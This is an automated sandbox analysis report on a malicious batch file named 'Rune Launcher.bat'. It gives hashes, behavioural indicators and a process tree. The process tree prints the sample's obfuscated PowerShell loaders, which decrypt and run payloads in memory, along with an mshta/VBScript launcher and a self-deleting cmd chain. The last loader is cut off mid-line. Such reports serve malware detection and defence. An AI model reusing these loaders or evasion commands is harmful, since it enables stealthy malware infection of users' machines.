420fb1238dd57cc2166770c49d1577eedc64ace3c130e5b10871b2e9b71f4c04

Analysis

max time kernel
104s
max time network
122s
platform
windows10-1703_x64
resource
win10-20231020-en
resource tags

arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system
submitted
12-11-2023 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Rune Launcher.bat
Size

12.5MB
MD5

7bc400c287e863d093e099a2a3d86d0a
SHA1

0c53d559fa4f3e58241f67986fe7c0d342671e20
SHA256

420fb1238dd57cc2166770c49d1577eedc64ace3c130e5b10871b2e9b71f4c04
SHA512

f028e1b6fff4b0ef0711f94e7fe0a0ba4a55e7ba4028a13db38ea2c1680510dfa7219d43231c8c2d9c53b6fd879f53f391170415717093a6b554912a326b08dc
SSDEEP

49152:uTP+Ip2MMykXMHOh7Ufks1muCwKWPM7J6QlHiVH7BRDS83Tm+fn907TA1HimUEQf:r

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4784 created 592	4784	Rune Launcher.bat.exe	3
PID 4784 created 592	4784	Rune Launcher.bat.exe	3

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation	$sxr-mshta.exe

Deletes itself 1 IoCs

pid	Process
4784	Rune Launcher.bat.exe

Executes dropped EXE 4 IoCs

pid	Process
4784	Rune Launcher.bat.exe
4120	$sxr-mshta.exe
3764	$sxr-cmd.exe
4280	$sxr-powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4784 set thread context of 4168	4784	Rune Launcher.bat.exe	85
PID 4784 set thread context of 4852	4784	Rune Launcher.bat.exe	86
PID 4784 set thread context of 2280	4784	Rune Launcher.bat.exe	113
PID 4784 set thread context of 832	4784	Rune Launcher.bat.exe	114

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-cmd.exe	Rune Launcher.bat.exe
File created	C:\Windows\$sxr-powershell.exe	Rune Launcher.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Rune Launcher.bat.exe
File created	C:\Windows\$sxr-mshta.exe	Rune Launcher.bat.exe
File opened for modification	C:\Windows\$sxr-mshta.exe	Rune Launcher.bat.exe
File created	C:\Windows\$sxr-cmd.exe	Rune Launcher.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2744	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133442966347418747"	chrome.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	$sxr-mshta.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
440	PING.EXE

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
4784	Rune Launcher.bat.exe
4784	Rune Launcher.bat.exe
4784	Rune Launcher.bat.exe
4784	Rune Launcher.bat.exe
4168	dllhost.exe
4168	dllhost.exe
4168	dllhost.exe
4168	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4784	Rune Launcher.bat.exe
4784	Rune Launcher.bat.exe
3140	chrome.exe
3140	chrome.exe
4280	$sxr-powershell.exe
4280	$sxr-powershell.exe
4280	$sxr-powershell.exe
4280	$sxr-powershell.exe
4280	$sxr-powershell.exe
4784	Rune Launcher.bat.exe
4784	Rune Launcher.bat.exe
2280	dllhost.exe
2280	dllhost.exe
832	dllhost.exe
832	dllhost.exe
832	dllhost.exe
832	dllhost.exe
2280	dllhost.exe
2280	dllhost.exe
4784	Rune Launcher.bat.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

pid	Process
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	Rune Launcher.bat.exe
Token: SeDebugPrivilege	2988	firefox.exe
Token: SeDebugPrivilege	2988	firefox.exe
Token: SeDebugPrivilege	4784	Rune Launcher.bat.exe
Token: SeDebugPrivilege	4168	dllhost.exe
Token: SeDebugPrivilege	4852	dllhost.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeDebugPrivilege	4280	$sxr-powershell.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeShutdownPrivilege	3140	chrome.exe
Token: SeCreatePagefilePrivilege	3140	chrome.exe
Token: SeDebugPrivilege	4784	Rune Launcher.bat.exe

Suspicious use of FindShellTrayWindow 30 IoCs

pid	Process
2988	firefox.exe
2988	firefox.exe
2988	firefox.exe
2988	firefox.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2988	firefox.exe
2988	firefox.exe
2988	firefox.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe
3140	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2988	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3776 wrote to memory of 4784	3776	cmd.exe	72
PID 3776 wrote to memory of 4784	3776	cmd.exe	72
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 308 wrote to memory of 2988	308	firefox.exe	75
PID 2988 wrote to memory of 4888	2988	firefox.exe	76
PID 2988 wrote to memory of 4888	2988	firefox.exe	76
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4564	2988	firefox.exe	77
PID 2988 wrote to memory of 4264	2988	firefox.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4188	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:592
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{67f5180d-e295-48e9-a6a4-a16c372430a4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4168
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5aa4a0ae-a00c-4765-8deb-3e7f5ac3eca6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2280

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3776
- C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe
  "Rune Launcher.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function SHGwC($UTBCI){ $fmqbG=[System.Security.Cryptography.Aes]::Create(); $fmqbG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $fmqbG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $fmqbG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WdXtlctSlAP8m6SKCcO2vkUdPZ3Es/58jfEWNOVlhFQ='); $fmqbG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/iWwpOMjdiY7RIMNInl/fA=='); $HomqC=$fmqbG.CreateDecryptor(); $return_var=$HomqC.TransformFinalBlock($UTBCI, 0, $UTBCI.Length); $HomqC.Dispose(); $fmqbG.Dispose(); $return_var;}function deYtL($UTBCI){ $znuQU=New-Object System.IO.MemoryStream(,$UTBCI); $MFuZx=New-Object System.IO.MemoryStream; $mbhrH=New-Object System.IO.Compression.GZipStream($znuQU, [IO.Compression.CompressionMode]::Decompress); $mbhrH.CopyTo($MFuZx); $mbhrH.Dispose(); $znuQU.Dispose(); $MFuZx.Dispose(); $MFuZx.ToArray();}function IPTXo($UTBCI,$xCkWf){ $UZztt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UTBCI); $nwjQd=$UZztt.EntryPoint; $nwjQd.Invoke($null, $xCkWf);}$gjCip=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat').Split([Environment]::NewLine);foreach ($iuYEU in $gjCip) { if ($iuYEU.StartsWith('SEROXEN')) { $LOAzE=$iuYEU.Substring(7); break; }}$ceDNZ=[string[]]$LOAzE.Split('\');$SeRqZ=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[0])));$KRkmN=deYtL (SHGwC ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ceDNZ[1])));IPTXo $KRkmN (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));IPTXo $SeRqZ (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Deletes itself
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- - C:\Windows\SysWOW64\dllhost.exe
    C:\Windows\SysWOW64\dllhost.exe /Processid:{6b4c3de7-d5bb-4d9f-875c-4d66292c0233}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4852
- - C:\Windows\SysWOW64\dllhost.exe
    C:\Windows\SysWOW64\dllhost.exe /Processid:{a216910b-e30e-4ed1-b338-562f48abdf48}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:832
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe" & exit
    3⤵
    PID:2572
  - - C:\Windows\system32\PING.EXE
      PING localhost -n 8
      4⤵
      Runs ping.exe
      PID:440
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe"
      4⤵
      Kills process with taskkill
      PID:2744
  - - C:\Windows\system32\attrib.exe
      ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Rune Launcher.bat.exe"
      4⤵
      Views/modifies file attributes
      PID:4188

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:308
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2988
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.0.43490716\1591596869" -parentBuildID 20221007134813 -prefsHandle 1668 -prefMapHandle 1656 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {69bdaa37-36b6-4fc1-b593-7fa88052cbd1} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 1764 1d952bf1f58 gpu
    3⤵
    PID:4888
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.1.34305944\496918661" -parentBuildID 20221007134813 -prefsHandle 2120 -prefMapHandle 2116 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94716fe1-3bba-47d8-a782-e0709cdffd96} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 2132 1d9526e5958 socket
    3⤵
    - Checks processor information in registry
    PID:4564
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.2.163446704\16873994" -childID 1 -isForBrowser -prefsHandle 2848 -prefMapHandle 2864 -prefsLen 21120 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0c5b83d-7172-490b-af36-1ed4c724ea91} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 2836 1d9568b6f58 tab
    3⤵
    PID:4264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.3.1851221678\1010196941" -childID 2 -isForBrowser -prefsHandle 3516 -prefMapHandle 3512 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed71e388-f965-46df-9ce7-f2a3f5d66315} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 3528 1d947768158 tab
    3⤵
    PID:4704
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.4.1353991920\1871152986" -childID 3 -isForBrowser -prefsHandle 4412 -prefMapHandle 4408 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a4af34b-4f14-4003-8ce5-5ef77b94e22e} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 4424 1d958a72258 tab
    3⤵
    PID:3512
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.7.1928744670\1284190711" -childID 6 -isForBrowser -prefsHandle 5212 -prefMapHandle 5216 -prefsLen 26699 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {648260e3-9a97-42e8-9c16-a260eefaf8a6} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 5204 1d958ea1158 tab
    3⤵
    PID:364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.6.724141230\1671457151" -childID 5 -isForBrowser -prefsHandle 5012 -prefMapHandle 5016 -prefsLen 26699 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f5f7b574-e6e1-4316-adf3-627f1e28ad46} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 5004 1d958ea0858 tab
    3⤵
    PID:820
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2988.5.666480353\1540837647" -childID 4 -isForBrowser -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 26699 -prefMapSize 232675 -jsInitHandle 976 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {54df7248-50cc-4e2f-ac36-b73d008d3ddf} 2988 "\\.\pipe\gecko-crash-server-pipe.2988" 4892 1d958a72858 tab
    3⤵
    PID:64

C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-ivkHnyDhFxrjOkRYhXDt4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:4120
- C:\Windows\$sxr-cmd.exe
  "C:\Windows\$sxr-cmd.exe" /c %$sxr-ivkHnyDhFxrjOkRYhXDt4312:&#<?=%
  2⤵
  - Executes dropped EXE
  PID:3764
- - C:\Windows\$sxr-powershell.exe
    C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function yYtzJ($VMskc){ $OpftU=[System.Security.Cryptography.Aes]::Create(); $OpftU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OpftU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OpftU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Zmazi/Qmi24DGi2+P+vWUx/yIjpkUJoheNseO2lYyOc='); $OpftU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cv1YiZvlJasFHSTdKR/cTg=='); $sTgYj=$OpftU.('rotpyrceDetaerC'[-1..-15] -join '')(); $EhfnY=$sTgYj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($VMskc, 0, $VMskc.Length); $sTgYj.Dispose(); $OpftU.Dispose(); $EhfnY;}function BQiql($VMskc){ $eHgwD=New-Object System.IO.MemoryStream(,$VMskc); $fFGax=New-Object System.IO.MemoryStream; $mIawN=New-Object System.IO.Compression.GZipStream($eHgwD, [IO.Compression.CompressionMode]::Decompress); $mIawN.CopyTo($fFGax); $mIawN.Dispose(); $eHgwD.Dispose(); $fFGax.Dispose(); $fFGax.ToArray();}function pHXZR($VMskc,$aIisd){ $Anshn=[System.Reflection.Assembly]::Load([byte[]]$VMskc); $uAKRn=$Anshn.EntryPoint; $uAKRn.Invoke($null, $aIisd);}$OpftU1 = New-Object System.Security.Cryptography.AesManaged;$OpftU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OpftU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OpftU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Zmazi/Qmi24DGi2+P+vWUx/yIjpkUJoheNseO2lYyOc=');$OpftU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cv1YiZvlJasFHSTdKR/cTg==');$DcyZX = $OpftU1.('rotpyrceDetaerC'[-1..-15] -join '')();$aNyUS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Z/fDofs7o8mImGEFjGSpdg==');$aNyUS = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aNyUS, 0, $aNyUS.Length);$aNyUS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aNyUS);$wfsGi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('05pB9aQa7NIKYBVi8n5R8lllhR6Mzwdnzyt2GaH/5lg=');$wfsGi = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wfsGi, 0, $wfsGi.Length);$wfsGi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($wfsGi);$DAUhI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qsdjy74sqEJB0DHqCT5R0A==');$DAUhI = $DcyZX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DAUhI, 0, $DAUhI.Length);$DAUhI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DAUhI);$moUBN = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 